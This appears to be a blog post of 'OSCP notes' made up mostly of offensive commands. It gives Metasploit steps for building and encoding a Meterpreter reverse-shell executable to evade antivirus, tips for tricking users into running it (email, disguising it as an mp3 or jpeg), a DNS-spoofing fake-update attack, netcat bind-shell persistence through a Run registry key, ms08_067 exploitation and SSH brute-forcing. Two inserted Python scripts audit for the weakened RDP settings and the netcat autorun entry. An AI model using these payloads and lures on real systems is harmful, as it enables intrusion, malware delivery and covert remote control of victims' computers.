Saturday, September 8, 2018

Random OSCP notes

medusa -h <host> -u <target-account> -P <password-file> -M ssh -e n -O output

## Add personal banner to Metasploit ##

Hi
I know you're gonna love this one :)
I was playing with Metasploit until I opened a folder called "UI".
Then I had an idea that I am going to share with you :)

How to make your own banner and add it to Metasploit?!
Go into this directory:
/opt/metasploit/apps/pro/msf3/lib/msf/ui/logos
and check out the content of every file except test.rb.

You can use this website to get nice banner templates:

https://ift.tt/nm5ejI

When you have made your own banner you need to give it a name and save it as ".txt".
Place it in the /logos directory.
Now open the file banner.rb and add your personal txt file "as shown in the photo".
save and exit.

That's it , enjoy metasploit  ;)
#########################
## How to bypass RDP authentication ##

RDP = Remote Desktop Protocol.

In this tutorial I will show you how to bypass the authentication window when trying to connect to a Windows box on port 3389 (the default RDP port).
Unfortunately we will need to use a Windows box for it to work.

This is how an RDP client looks on windows:
Let's say you need to connect to a remote Windows desktop; after entering the IP, click Connect.
This window will appear:
You will be asked to enter a password for the remote machine. Do not worry about it if you don't have it.
Go back to the remote connection window and click on: Show Options.
This window will appear:
Click on: Save As and save it on your desktop; it will look like this:
Right-click it > Open with > Notepad

Change "authentication level:i:2" to "authentication level:i:0". What this does is take all the security measures away from connecting. Like this:

Scroll down to the bottom of the Notepad window and add "enablecredsspsupport:i:0". Now press "Ctrl + S" to save it. Like this:

Now open the remote desktop connection file we have just made.

You should get the regular remote desktop connection window. Enter a IP address and click "Connect".

You should get a screen that looks like this. Click "Connect" and it should connect you. If it brings up the credentials screen, enter your password and click "OK"; it will work now.

You will get this message, click "Yes".

And voilà:
Enjoy the tutorial and DO NOT TRY IT ON A BOX THAT IS NOT YOURS OR THAT YOU HAVE NO PERMISSION TO CONNECT TO.
TCP connections are traceable.
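The two .rdp keys edited in the tutorial above only change what the client is willing to accept: "authentication level:i:0" suppresses the warning when server authentication fails, and "enablecredsspsupport:i:0" stops the client from using CredSSP, so a server that requires Network Level Authentication still rejects the session. On the defensive side, the useful check is to audit .rdp files that are shared around (helpdesk shares, jump-host profiles) for exactly these weakened values. The auditor below is an added example, not code from the original post; the two setting names are real mstsc keys, the sample files are constructed, and the descriptions of the findings are our own wording.

```python
"""Audit .rdp connection files for settings that weaken the client's own
authentication checks.

Added example for the tutorial above; it is not part of the original post.
An .rdp file is plain text, one "name:type:value" setting per line, where
type 'i' is an integer, 's' a string and 'b' a binary blob.  The two keys
the tutorial edits are real mstsc settings; the descriptions are ours.
"""
import codecs
import re
from typing import Dict, List, Tuple

# Settings whose value 0 removes a client-side safeguard.
WEAK_SETTINGS: Dict[str, Tuple[int, str]] = {
    # 0 = connect without warning when server authentication fails
    "authentication level": (0, "server certificate failures are silently ignored"),
    # 0 = do not use CredSSP, i.e. no Network Level Authentication from the client
    "enablecredsspsupport": (0, "CredSSP/NLA disabled on the client side"),
}

LINE_RE = re.compile(r"^\s*(?P<name>[^:]+):(?P<type>[isb]):(?P<value>.*)$")


def parse_rdp(text: str) -> Dict[str, Tuple[str, str]]:
    """Return {setting name (lower-cased): (type letter, raw value)}."""
    settings: Dict[str, Tuple[str, str]] = {}
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # blank or malformed line: ignore, do not fail the audit
        settings[m.group("name").strip().lower()] = (
            m.group("type"),
            m.group("value").strip(),
        )
    return settings


def audit_rdp(text: str) -> List[str]:
    """List the weakened settings found in the .rdp text, in WEAK_SETTINGS order."""
    findings: List[str] = []
    settings = parse_rdp(text)
    for name, (weak_value, why) in WEAK_SETTINGS.items():
        entry = settings.get(name)
        if entry is None:
            continue  # absent key: mstsc applies its default, nothing to flag here
        typ, value = entry
        if typ == "i" and value.lstrip("-").isdigit() and int(value) == weak_value:
            findings.append(f"{name}:i:{value} -> {why}")
    return findings


def read_rdp_file(path: str) -> str:
    """mstsc.exe saves .rdp files as UTF-16 with a BOM; hand-edited copies are
    often UTF-8, so decode by BOM and fall back to UTF-8."""
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig")


# Constructed samples: a default-looking file and one edited as in the tutorial.
SAFE_RDP = """\
full address:s:192.168.1.15
authentication level:i:2
enablecredsspsupport:i:1
"""

WEAKENED_RDP = """\
full address:s:192.168.1.15
authentication level:i:0
enablecredsspsupport:i:0
"""

if __name__ == "__main__":
    for label, sample in (("safe", SAFE_RDP), ("weakened", WEAKENED_RDP)):
        print(label, audit_rdp(sample) or "no weakened settings")
```

Run it over a directory of .rdp files with `read_rdp_file` feeding `audit_rdp`; the server-side control that makes the client edit irrelevant is requiring NLA on the RDP hosts themselves.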

###################
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=4444 X > /root/Desktop/n1tr0g3n.exe
LHOST = your BackTrack IP address or attacking computer IP address, which will be waiting for the connection with Meterpreter.

LPORT = default port Metasploit uses ("just use it ;)")

/root/Desktop/n1tr0g3n.exe = path and name you want for the .exe (make sure to name it with the .exe extension so Windows knows how to run it).

Output should look something like this when it's done:

Here's the command to encrypt the file 8 times using x86/shikata_ga_nai for those of you who might ask anyways and want to try and make it undetectable to AV's.  ;)

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 8 -t exe -x /root/n1tr0g3n.exe -o /root/n1tr0g3n.exe

Just change the .exe name, LPORT and LHOST to the ones you need and you'll be good.

Now send this file to a user through email or a jump drive if you're on the same network, and tell them to open it up; it will execute and start the listener automatically.
Now we're going to set up a listener with Meterpreter waiting for the connection from the victim.

open up terminal and type
msfconsole
once metasploit loads up type

use exploit/multi/handler                 ----->  Exploit you will be using

set LHOST 192.168.1.15       ------>  your Backtrack machine or attacker machines IP Address once again

set LPORT 4444                 ----> same default port metasploit uses and you chose while creating the .exe

set PAYLOAD windows/meterpreter/reverse_tcp             ------>  Payload used for reverse connection back to you.

exploit                      --------> to officially start the listener

Now go over to your Windows box (the "victim"), double-click the executable and watch as Meterpreter opens a session; you should now have an open session on the exploited box and have full control.

There's a lot you can do with this, but you may want to bind the file to an mp3 or jpeg so when the victim opens it they get a generic error and don't really know what happened in the background... We know what happened and would be suspicious, but most people barely know how to surf the web, so attacks like this can happen very easily :D


Might I suggest using msfencode and the shikata_ga_nai permutation a couple of times to get it past AV and FW?

=) I know you already know this though!!!

To reduce detection it's best to use various encoding options.

A bit like this:

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.105 LPORT=5632 R | \
./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
./msfencode -e x86/countdown -c 2 -t raw | \
./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
./msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 2 -o payload.exe


Also, if you want to use the exploit, best to test with AV on your local machine to avoid sites like VirusTotal passing it on to AV vendors.

Could I suggest a different file type?

.VBS is not scanned by AV and works, I would say, 98% of the time =)


#################

Greetings
** This tutorial is an explanation (not detailed); therefore it is not for beginners. You need to be familiar with several steps:
-Proxy & socks
-Ettercap and Dns spoof
-Metasploit
-SET
-Netcat
-registry editing

Let's Begin

1 Start computer, connect and get proxy.

2 DISCONNECT FROM INTERNET SAVE PROXY INFO BUT DONT RUN

3 change hostname & hosts file, then restart computer

4 then sign in (not connected to network) and change mac

5 open up firefox (still not connected) and enter proxy info

(optional: go into router and turn logging and firewall off)

6 connect to internet.

7 run nmap and etherape (optional: wireshark)

8 cp /pentest/windows-binaries/tools/nc.exe /root/Desktop

9 Run SET use java attack to start meterpreter session

10 DNS spoof the network


Now wait for the victim to download the fake update and you will get a meterpreter shell.

sessions -i <session #>   (i.e. sessions -i 1)

**when meterpreter session connected**

(you'll need to have netcat copied to the desktop)

11 upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\

reg setval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v System -d c:\\WINDOWS\\system32\\nc.exe" -L -d -p 1111 -e cmd.exe"


check it by:

reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run


-then-

spoof anything, add users, create folders/documents, take screenshots, kill processes, etc.

then type:

reboot

then to connect

nc (ip address) 1111

Enjoy ;) do not be destructive.
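The persistence step above (netcat dropped into system32 and registered under a Run key with a listener and a shell attached) is loud from a defender's point of view: it is a new autorun value, and its command line carries tell-tale flags. The walkthrough sets the value under HKCU and then enumerates HKLM, so an audit should read both hives. The script below is an added example, not code from the original post: it parses `reg query`-style output (the sample text is constructed), applies heuristics of our own for a bind-shell command line, and reports the offending values. Pair it with a review of host-firewall rules, since the listener also needs its inbound port (1111 in the walkthrough) to be reachable.

```python
"""Flag Run-key autorun entries that look like a netcat listener with a
command shell attached (the persistence step shown above).

Added example; not part of the original post.  SAMPLE_REG_QUERY is
constructed to mimic `reg query` output, and the heuristics are ours.
Both HKCU and HKLM Run keys are parsed from the same text.
"""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    System    REG_SZ    c:\WINDOWS\system32\nc.exe -L -d -p 1111 -e cmd.exe

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
"""

KEY_RE = re.compile(r"^(HKEY_[A-Z_]+\\.+)$")
VALUE_RE = re.compile(r"^\s{2,}(?P<name>\S.*?)\s{2,}(?P<type>REG_[A-Z_]+)\s{2,}(?P<data>.*)$")

# Binary names commonly used for the netcat listener; extend from your own telemetry.
NETCAT_NAMES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
SHELL_PROGRAMS = ("cmd", "powershell", "/bin/")


@dataclass
class Finding:
    key: str
    value_name: str
    data: str
    reasons: List[str] = field(default_factory=list)


def parse_reg_query(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (key, value name, type, data) tuples from `reg query` style text."""
    entries = []
    current_key = None
    for line in text.splitlines():
        km = KEY_RE.match(line)
        if km:
            current_key = km.group(1)
            continue
        vm = VALUE_RE.match(line)
        if vm and current_key:
            entries.append((current_key, vm.group("name"), vm.group("type"), vm.group("data").strip()))
    return entries


def assess_autorun(data: str) -> List[str]:
    """Heuristics for a bind-shell style command line; empty list means nothing seen."""
    reasons: List[str] = []
    tokens = data.replace('"', "").split()
    if not tokens:
        return reasons
    exe = tokens[0].rsplit("\\", 1)[-1].lower()
    if exe in NETCAT_NAMES:
        reasons.append(f"known netcat binary {exe}")
    flags = {t.lower() for t in tokens[1:] if t.startswith("-")}
    if "-l" in flags:
        reasons.append("listen flag (-l/-L): opens an inbound port at logon")
    if "-p" in flags:
        reasons.append("fixed port (-p)")
    for i, tok in enumerate(tokens[1:-1], start=1):
        if tok.lower() == "-e" and tokens[i + 1].lower().startswith(SHELL_PROGRAMS):
            reasons.append(f"-e {tokens[i + 1]}: command interpreter attached to the socket")
    return reasons


def audit_run_keys(text: str) -> List[Finding]:
    """Run assess_autorun over every Run-key value and keep the ones with reasons."""
    findings = []
    for key, name, _typ, data in parse_reg_query(text):
        reasons = assess_autorun(data)
        if reasons:
            findings.append(Finding(key, name, data, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_run_keys(SAMPLE_REG_QUERY):
        print(f"{f.key}\\{f.value_name}: {f.data}")
        for r in f.reasons:
            print("   -", r)
```

On a live host, feed it the output of `reg query` for both Run keys; the value name "System" pointing at a netcat binary in system32 is flagged on the binary name alone, and the listen, port and `-e` flags each add a reason.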

#################


set LHOST [IP ADDRESS INT.] = set LHOST 192.168.1.15

# rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"

# search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg

# So when you input anything where there is [], remember to remove the []

use exploit/windows/smb/ms08_067_netapi
set payload windows/shell_bind_tcp
set target 12
set lport 123
set rhost 192.168.177.131
exploit -i

use exploit/windows/smb/ms08_067_netapi
set payload windows/shell_reverse_tcp
set target 12
set lport 123
set lhost 192.168.177.128
set rhost 192.168.177.131
exploit -i

use exploit/multi/handler
set lhost 192.168.2.7
set lport 443
set payload windows/meterpreter/reverse_tcp
exploit

############################



